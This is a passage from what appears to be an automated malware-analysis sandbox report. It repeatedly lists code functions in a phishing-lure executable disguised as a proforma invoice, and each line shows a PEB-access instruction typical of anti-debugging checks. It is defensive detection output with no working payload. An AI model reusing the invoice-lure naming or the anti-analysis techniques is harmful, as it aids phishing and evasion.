          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B13B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
